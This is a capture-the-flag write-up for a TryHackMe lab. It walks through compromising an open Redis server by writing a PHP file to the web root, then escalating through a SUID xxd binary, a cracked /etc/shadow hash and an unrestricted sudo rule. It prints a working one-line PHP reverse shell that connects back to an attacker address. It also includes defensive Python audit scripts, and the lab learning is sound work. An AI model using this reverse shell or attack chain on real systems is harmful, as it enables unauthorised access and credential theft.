Date: 27/03/2022

Difficulty: Easy

CTF: https://tryhackme.com/room/res


Hack into a vulnerable database server with an in-memory data-structure in this semi-guided challenge!

Scan the machine, how many ports are open?

[screenshot]

What’s the database management system installed on the server?

What port is the database management system running on?

What’s the version of the management system installed on the server?

[screenshot]

Compromise the machine and locate user.txt

First of all, let’s visit the web page hosted on port 80:

[screenshot]

It displays the default page of a freshly installed Apache server.

As we have seen, there is a Redis server running on port 6379. After some reading, I found that there is a way to interact with this service.

Let’s download the Redis client (redis-cli):

https://redis.io/docs/getting-started/
https://redis.io/docs/manual/cli/

Let’s test the connection:

[screenshot]

It seems like we have a connection to the Redis server!

[screenshot]

The info command is useful for retrieving information about the Redis server:

[screenshot]

According to this page (https://book.hacktricks.xyz/pentesting/6379-pentesting-redis), there is a way to get remote code execution on a Redis server that lets unauthenticated clients reconfigure where it saves its database file:

[screenshot]

We need to know the path where we want to write the PHP file. Since we visited the page before, we know that the web root is /var/www/html.
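Everything that made this step possible is a configuration choice on the Redis side: the server listens on a routable interface, protected mode is off, there is no password, clients may still call CONFIG, and the dump directory can be pointed at the web root. The following Python script is an added example (not part of the original write-up or of the Redis project) that audits a redis.conf for exactly those settings. Both configuration samples, the web-root prefix list and the function names are constructed for the example; Redis 6+ ACL users are an alternative to requirepass that the script does not model.

```python
"""Audit a redis.conf for the settings that make the dump-file write technique possible."""

# Constructed sample in the spirit of the target in the write-up: reachable
# from anywhere, no auth, CONFIG still available, dump directory under the web root.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
dir /var/www/html
"""

# Constructed hardened counterpart.
HARDENED_CONF = """\
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass replace-with-a-long-random-passphrase
rename-command CONFIG ""
rename-command DEBUG ""
dir /var/lib/redis
"""

# Constructed list of directory prefixes served by common web servers.
WEB_ROOTS = ("/var/www", "/srv/http", "/usr/share/nginx")


def parse_redis_conf(text):
    """Map each directive (lower-cased) to the list of argument lists it was given.

    Directives such as rename-command may appear several times, hence a list per key."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_redis_conf(text):
    """Return human-readable findings, each prefixed with the directive it concerns.

    An empty list means none of the checked weaknesses is present."""
    conf = parse_redis_conf(text)
    findings = []

    # 1. Network exposure: no bind line (Redis then listens everywhere) or a wildcard address.
    binds = conf.get("bind", [])
    if not binds or any(addr in ("0.0.0.0", "*", "::") for args in binds for addr in args):
        findings.append("bind: reachable on all interfaces; bind to 127.0.0.1 or a private address")

    # 2. protected-mode refuses remote clients when neither bind nor requirepass is set.
    if any(args and args[0].lower() == "no" for args in conf.get("protected-mode", [])):
        findings.append("protected-mode: disabled; leave it at 'yes'")

    # 3. No password at all: any client that can reach the port has full control.
    if "requirepass" not in conf:
        findings.append("requirepass: not set; set a strong password (or use Redis 6+ ACL users)")

    # 4. CONFIG SET dir/dbfilename is what lets a client choose where the dump lands.
    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    if "CONFIG" not in renamed:
        findings.append('rename-command: CONFIG still reachable; rename it or disable it with ""')

    # 5. A dump directory under the web root means a saved RDB file is served as web content.
    for args in conf.get("dir", []):
        if args and args[0].startswith(WEB_ROOTS):
            findings.append(f"dir: {args[0]} is under a web root; use a dedicated directory such as /var/lib/redis")

    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"== {label} ==")
        for finding in audit_redis_conf(text) or ["no findings"]:
            print(" ", finding)
```

The dir check only catches what is written in the file; at runtime a client with CONFIG access can still move the dump directory, which is why disabling CONFIG (or restricting it through ACLs) matters more than the on-disk dir value.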

So, following those steps, we do the same in our case:

[screenshot]

Now let’s visit the page:

[screenshot]

It works. Now let’s try to write a reverse shell in PHP:

[screenshot]

Let’s open a netcat listener on our machine:

[screenshot]

And let’s visit the rs.php file:

[screenshot]

We get a connection, but it disconnects right away…

Let’s try this other one-line PHP reverse shell:

<?php exec("/bin/bash -c \'bash -i > /dev/tcp/10.10.10.10/1234 0>&1\'"); ?>

[screenshot]

Yeah, this one works!

[screenshot]

We find the user.txt file in the /home/vianka folder.

What is the local user account password?

Before anything else, let’s stabilize this shell:

[screenshot]

Python is installed on the machine, so let’s use it:

[screenshot]

OK, shell stabilized. Now let’s look for the local user account password. Can we read the /etc/shadow file?

[screenshot]

Nope, we can’t.

Anything interesting in the history?

[screenshot]

Let’s see if we can find some keys in the user directory… nothing useful that I can see…

After spending some time looking for SSH keys or anything else useful, I look for files with the SUID bit set:

[screenshot]

From this list, xxd appears in GTFOBins:

[screenshot]

Exploiting this, we should be able to read the /etc/shadow file, since a SUID binary runs with its owner’s (root’s) privileges regardless of who launches it!
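The root cause here is a general-purpose tool carrying a SUID bit it has no business having. The defensive check is to compare the host’s SUID inventory against a known-good baseline and strip the bit from anything unexpected. The Python script below is an added example (not part of the original write-up or of any tool the write-up uses): the find output and the baseline set are constructed, and the function names are my own. A real baseline should come from the package manager or a golden image rather than from memory.

```python
"""Compare a host's SUID binaries against a baseline and report the odd ones out."""
import os
import stat

# Constructed sample of what `find / -perm -4000 -type f 2>/dev/null` printed,
# with xxd standing out the way it does in the write-up.
FIND_OUTPUT = """\
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/xxd
/usr/lib/openssh/ssh-keysign
/bin/ping
/bin/su
"""

# Constructed baseline of basenames that legitimately carry the SUID bit on a
# typical Debian/Ubuntu host. Replace with the output from a trusted image.
BASELINE = {
    "passwd", "sudo", "newgrp", "ssh-keysign", "ping", "su",
    "mount", "umount", "chsh", "chfn", "gpasswd", "pkexec",
}


def unexpected_suid(find_output, baseline):
    """Return, sorted, the SUID paths whose basename is not in the baseline."""
    paths = [line.strip() for line in find_output.splitlines() if line.strip()]
    return sorted(p for p in paths if os.path.basename(p) not in baseline)


def live_suid_inventory(root="/"):
    """Walk the filesystem and return every regular file with the SUID bit set.

    Equivalent to `find ROOT -perm -4000 -type f`; unreadable entries are skipped."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda err: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return found


if __name__ == "__main__":
    # Offline run over the constructed sample; swap in "\n".join(live_suid_inventory())
    # to audit the host the script is running on.
    for path in unexpected_suid(FIND_OUTPUT, BASELINE):
        print("unexpected SUID binary:", path)
```

For anything the script reports, the fix is `chmod u-s` on the file (after confirming nothing legitimate depends on it), and the same comparison belongs in a periodic integrity check so that a bit added later is noticed.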

[screenshot]

Yeah! Now, combining this with the info from /etc/passwd, let’s use unshadow and John the Ripper to crack the hash!

[screenshot]

Unshadow done. Now let’s crack it!

[screenshot]

Cool!

Escalate privileges and obtain root.txt

Let’s log in as vianka and see if we have more permissions:

[screenshot]

Enough permissions to access the root folder?

[screenshot]

Nope. Let’s see what we can run with sudo:

[screenshot]

Really? We can run any command with sudo…
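A sudoers rule that grants a non-root user ALL commands (with or without NOPASSWD) turns a cracked user password straight into root, which is what happens here. The Python script below is an added example (not part of the original write-up or of the sudo project) that parses the common one-line form of /etc/sudoers user specifications and flags such rules. The sudoers excerpt is constructed (the vianka line mirrors the write-up, the others are there for contrast); the parser deliberately ignores Defaults, alias definitions and line continuations.

```python
"""Flag /etc/sudoers user specifications that grant unrestricted commands."""
import re

# Constructed excerpt; the vianka line reflects the finding in the write-up.
SUDOERS_SAMPLE = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
vianka  ALL=(ALL) NOPASSWD: ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
"""

SKIP_PREFIXES = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")
# user  host=(runas) [TAG: ...] commands
RULE_RE = re.compile(r"^(\S+)\s+([^\s=]+)\s*=\s*(?:\(([^)]*)\))?\s*(.*)$")
TAG_RE = re.compile(r"^([A-Z]+):\s*(.*)$")


def parse_sudoers(text):
    """Return one dict per user specification: user, host, runas, tags, commands.

    Only the plain one-line form is handled; Defaults, aliases and comments are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        user, host, runas, spec = m.groups()
        tags = []
        while True:  # peel off NOPASSWD:, SETENV:, NOEXEC: ... prefixes
            t = TAG_RE.match(spec)
            if not t:
                break
            tags.append(t.group(1))
            spec = t.group(2)
        commands = [c.strip() for c in spec.split(",") if c.strip()]
        rules.append({"user": user, "host": host, "runas": runas or "root",
                      "tags": tags, "commands": commands})
    return rules


def risky_sudoers(text):
    """Return (principal, severity, reason) for non-root rules whose command list is ALL.

    NOPASSWD + ALL is rated critical: knowing the account password is not even required.
    ALL with a password prompt is rated high; for an admin group such as %sudo the
    follow-up is to review who is a member rather than to delete the rule."""
    findings = []
    for rule in parse_sudoers(text):
        if rule["user"] == "root" or "ALL" not in rule["commands"]:
            continue
        if "NOPASSWD" in rule["tags"]:
            findings.append((rule["user"], "critical",
                             f"any command as {rule['runas']} without a password"))
        else:
            findings.append((rule["user"], "high",
                             f"any command as {rule['runas']} (review membership)"))
    return findings


if __name__ == "__main__":
    for principal, severity, reason in risky_sudoers(SUDOERS_SAMPLE):
        print(f"{severity:8} {principal:10} {reason}")
```

The backup rule is the shape to aim for: one named binary, one run-as user. Restricting a rule to a specific command is only a real restriction if that command cannot itself spawn a shell or write arbitrary files, so each allowed binary still needs a look of its own.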

[screenshot]

Woah

[screenshot]

And just like that, we get the last flag!